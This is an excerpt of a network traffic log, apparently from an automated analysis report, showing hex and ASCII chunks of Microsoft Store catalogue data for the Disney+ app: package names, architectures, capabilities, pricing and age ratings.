                                                                                                                                                                                    2023-01-05 07:59:10 UTC15245INData Raw: 33 37 33 32 37 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 32 32 65 30 63 65 37 66 2d 34 32 37 61 2d 34 30 66 61 2d 62 66 61 36 2d 30 64 65 37 62 38 35 35 34 38 34 30 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55
                                                                                                                                                                                    Data Ascii: 37327","WuCategoryId":"22e0ce7f-427a-40fa-bfa6-0de7b8554840","PackageFamilyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","SkuId":"0010","Content":null,"PackageFeatures":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuU
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15246INData Raw: 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 49 46 69 6c 74 65 72 22 3a 7b 22 45 78 63 6c 75 73 69 6f 6e 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 5d 2c 22 49 6e 63 6c 75 73 69 6f 6e 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 5d 7d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 54 61 78 65 73 4e 6f 74 49 6e 63 6c 75 64 65 64 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 4f 72 69 67 69 6e 61 6c 52 65 6c 65 61 73 65 44 61 74 65 22 3a 22 32 30 31 39 2d 30 37 2d
                                                                                                                                                                                    Data Ascii: ntKeys":[],"PIFilter":{"ExclusionProperties":[],"InclusionProperties":[]},"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"TaxesNotIncluded","WholesaleCurrencyCode":""}},"Properties":{"OriginalReleaseDate":"2019-07-
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15247INData Raw: 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 34 65 37 32 33 32 33 32 2d 37 62 36 30 2d 34 66 37 32 2d 39 39 32 35 2d 39 30 32 66 37 35 36 61 38 33 62 32 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 39 65 65 35 62 61 62 33 2d 63 65 62 39 2d 34 65 63 61 2d 38 62 38 63 2d 36 35 32 32 38 61 65 30 66 36 66 30 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 4e 58 51 58 58 4c 46 53
                                                                                                                                                                                    Data Ascii: "LicensingKeyIds":["1"]},{"EntitlementKeys":["wes:App:4e723232-7b60-4f72-9925-902f756a83b2:Full"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["wes:App:9ee5bab3-ceb9-4eca-8b8c-65228ae0f6f0:Full"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["big:9NXQXXLFS
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15248INData Raw: 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 48 6f 6c 6f 67 72 61 70 68 69 63 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 43 6f 72 65 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 7d 2c 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 32 31 54 31 37 3a 33 34 3a 31 31 2e 34 37
                                                                                                                                                                                    Data Ascii: ormName":"Windows.Holographic"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Core"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1753-01-01T00:00:00.0000000Z"},"LastModifiedDate":"2022-12-21T17:34:11.47
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15249INData Raw: 3a 33 34 3a 31 31 2e 33 37 39 34 36 35 39 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 53 6b 75 44 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 73 6e 65 79 2b 20 69 73 20 74 68 65 20 73 74 72 65 61 6d 69 6e 67 20 68 6f 6d 65 20 6f 66 20 79 6f 75 72 20 66 61 76 6f 72 69 74 65 20 73 74 6f 72 69 65 73 2e 20 57 69 74 68 20 74 68 6f 75 73 61 6e 64 73 20 6f 66 20 68 6f 75 72 73 20 6f 66 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 66 72 6f 6d 20 44 69 73 6e 65 79 2c 20 50 69 78 61 72 2c 20 4d 61 72 76 65 6c 2c 20 53 74 61 72 20 57 61 72 73 2c 20 61 6e 64 20 4e 61 74 69 6f 6e 61 6c 20 47 65 6f 67 72 61 70 68 69 63 2c 20 74 68 65 72 65 27 73 20 61 6c 77 61 79 73 20 73 6f 6d 65 74 68 69 6e 67 20 74 6f 20 65 78 70 6c 6f 72 65
                                                                                                                                                                                    Data Ascii: :34:11.3794659Z","LocalizedProperties":[{"SkuDescription":"Disney+ is the streaming home of your favorite stories. With thousands of hours of entertainment from Disney, Pixar, Marvel, Star Wars, and National Geographic, there's always something to explore
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15250INData Raw: 2b 2c 20 70 6c 65 61 73 65 20 76 69 73 69 74 3a 20 68 74 74 70 3a 2f 2f 68 65 6c 70 2e 64 69 73 6e 65 79 70 6c 75 73 2e 63 6f 6d 5c 72 5c 6e 46 6f 72 20 6f 75 72 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 20 61 6e 64 20 6f 74 68 65 72 20 70 6f 6c 69 63 69 65 73 20 70 6c 65 61 73 65 20 76 69 73 69 74 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 6e 65 79 70 6c 75 73 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 73 75 62 73 63 72 69 62 65 72 2d 61 67 72 65 65 6d 65 6e 74 5c 72 5c 6e 59 6f 75 72 20 43 61 6c 69 66 6f 72 6e 69 61 20 50 72 69 76 61 63 79 20 52 69 67 68 74 73 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 73 6e 65 79 70 6c 75 73 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 79 6f 75 72 2d 63 61 6c 69 66 6f 72 6e 69 61 2d 70 72 69 76 61 63 79 2d 72 69 67 68
                                                                                                                                                                                    Data Ascii: +, please visit: http://help.disneyplus.com\r\nFor our Subscriber Agreement and other policies please visit: https://disneyplus.com/legal/subscriber-agreement\r\nYour California Privacy Rights: https://www.disneyplus.com/legal/your-california-privacy-righ
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15251INData Raw: 4f 22 2c 22 42 4e 22 2c 22 42 46 22 2c 22 42 49 22 2c 22 4b 48 22 2c 22 43 4d 22 2c 22 43 56 22 2c 22 4b 59 22 2c 22 43 46 22 2c 22 54 44 22 2c 22 54 4c 22 2c 22 44 4a 22 2c 22 44 4d 22 2c 22 44 4f 22 2c 22 45 43 22 2c 22 53 56 22 2c 22 47 51 22 2c 22 45 52 22 2c 22 45 54 22 2c 22 46 4b 22 2c 22 46 4f 22 2c 22 46 4a 22 2c 22 47 46 22 2c 22 50 46 22 2c 22 54 46 22 2c 22 47 41 22 2c 22 47 4d 22 2c 22 47 45 22 2c 22 47 48 22 2c 22 47 49 22 2c 22 47 4c 22 2c 22 47 44 22 2c 22 47 50 22 2c 22 47 55 22 2c 22 47 47 22 2c 22 47 4e 22 2c 22 47 57 22 2c 22 47 59 22 2c 22 48 54 22 2c 22 48 4d 22 2c 22 48 4e 22 2c 22 41 5a 22 2c 22 42 53 22 2c 22 42 42 22 2c 22 42 59 22 2c 22 42 5a 22 2c 22 42 4a 22 2c 22 42 4d 22 2c 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43
                                                                                                                                                                                    Data Ascii: O","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","C
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15252INData Raw: 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 78 36 34 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 2c 22 68 65 76 63 50 6c 61 79 62 61 63 6b 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 39 30 39 38 35 31 30 34 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 37 33 37 33 33 31 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79
                                                                                                                                                                                    Data Ascii: tionId":"App"}],"Architectures":["x64"],"Capabilities":["internetClient","privateNetworkClientServer","hevcPlayback"],"ExperienceIds":[],"MaxDownloadSizeInBytes":90985104,"MaxInstallSizeInBytes":127373312,"PackageFormat":"Msix","PackageFamilyName":"Disney
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15253INData Raw: 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 35 7d 2c 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 33 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c
                                                                                                                                                                                    Data Ascii: tform.target\":5},{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":fal
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15254INData Raw: 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 35 30 33 38 32 37 37 31 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 37 33 37 33 33 31 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 45 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 34 34 2e 32 2e 37 30 5f 78 36 34 5f 5f 36
                                                                                                                                                                                    Data Ascii: rienceIds":[],"MaxDownloadSizeInBytes":150382771,"MaxInstallSizeInBytes":127373312,"PackageFormat":"EMsix","PackageFamilyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","MainPackageFamilyNameForDlc":null,"PackageFullName":"Disney.37853FC22B2CE_1.44.2.70_x64__6
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15255INData Raw: 74 4f 75 74 2e 44 56 52 5c 22 3a 74 72 75 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d
                                                                                                                                                                                    Data Ascii: tOut.DVR\":true,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\":51,\"systemId\":12},{\"level\":29,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15256INData Raw: 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 30 33 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f 78 22 7d 2c 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22
                                                                                                                                                                                    Data Ascii: kageRank":30003,"PlatformDependencies":[{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Xbox"},{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15257INData Raw: 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 58 51 58 58 4c 46 53 54 38 39 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 36 62 65 37 31 66 36 31 2d 36 35 64 64 2d 34 37 32 31 2d 61 61 62 65 2d 38 63 34 36 34 36 37 33
                                                                                                                                                                                    Data Ascii: Id\":12},{\"level\":29,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9NXQXXLFST89","WuBundleId":"6be71f61-65dd-4721-aabe-8c464673
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15258INData Raw: 6f 77 73 2e 58 62 6f 78 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 34 34 2e 32 2e 37 30 5f 61 72 6d 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 34 65 37 32 33 32 33 32 2d 37 62 36 30 2d 34 66 37 32 2d 39 39 32 35 2d 39 30 32 66 37 35 36 61 38 33 62 32 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65
                                                                                                                                                                                    Data Ascii: ows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"Disney.37853FC22B2CE_1.44.2.70_arm__6rarf9sa4v8jt\",\"content.productId\":\"4e723232-7b60-4f72-9925-902f756a83b2\",\"content.targe
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15259INData Raw: 6d 69 6c 79 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 61 72 6d 36 34 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 2c 22 68 65 76 63 50 6c 61 79 62 61 63 6b 22 5d 2c 22 45 78 70 65 72 69
                                                                                                                                                                                    Data Ascii: milyName":"Disney.37853FC22B2CE_6rarf9sa4v8jt","SkuId":"0011","Content":null,"PackageFeatures":null}},{"Applications":[{"ApplicationId":"App"}],"Architectures":["arm64"],"Capabilities":["internetClient","privateNetworkClientServer","hevcPlayback"],"Experi
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15260INData Raw: 32 66 37 35 36 61 38 33 62 32 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 35 7d 2c 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74
                                                                                                                                                                                    Data Ascii: 2f756a83b2\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.target\":5},{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.t
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15261INData Raw: 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 61 72 6d 36 34 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 2c 22 68 65 76 63 50 6c 61 79 62 61 63 6b 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 35 30 32 37 34 32 35 39 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 32 37 39 35 30 38 34 38 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 45 4d 73 69 78 22 2c 22 50 61 63 6b 61 67 65 46 61
                                                                                                                                                                                    Data Ascii: s":[{"ApplicationId":"App"}],"Architectures":["arm64"],"Capabilities":["internetClient","privateNetworkClientServer","hevcPlayback"],"ExperienceIds":[],"MaxDownloadSizeInBytes":150274259,"MaxInstallSizeInBytes":127950848,"PackageFormat":"EMsix","PackageFa
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15262INData Raw: 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 74 72 75 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22
                                                                                                                                                                                    Data Ascii: \"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":false,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":true,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"systemId\":5},{\"level\"
                                                                                                                                                                                    2023-01-05 07:59:10 UTC15263INData Raw: 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 44 69 73 6e 65 79 2e 33 37 38 35 33 46 43 32 32 42 32 43 45 5f 31 2e 34 34 2e 32 2e 30 5f 78 38 36 5f 5f 36 72 61 72 66 39 73 61 34 76 38 6a 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 65 35 35 31 62 63 34 32 2d 39 61 64 36 2d 34 65 61 65 2d 39 39 39 66 2d 39 36 39 32 37 61 66 37 37 36 66 35 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 30 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 22 50 6c 61 74 66 6f 72 6d 4e 61
                                                                                                                                                                                    Data Ascii: ameForDlc":null,"PackageFullName":"Disney.37853FC22B2CE_1.44.2.0_x86__6rarf9sa4v8jt","PackageId":"e551bc42-9ad6-4eae-999f-96927af776f5-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814751014977536,"MinVersion":2814751014977536,"PlatformNa
